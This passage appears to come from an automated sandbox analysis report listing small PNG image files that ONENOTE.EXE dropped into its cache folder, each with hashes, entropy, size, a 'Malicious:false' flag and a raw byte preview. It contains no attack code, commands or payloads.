                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
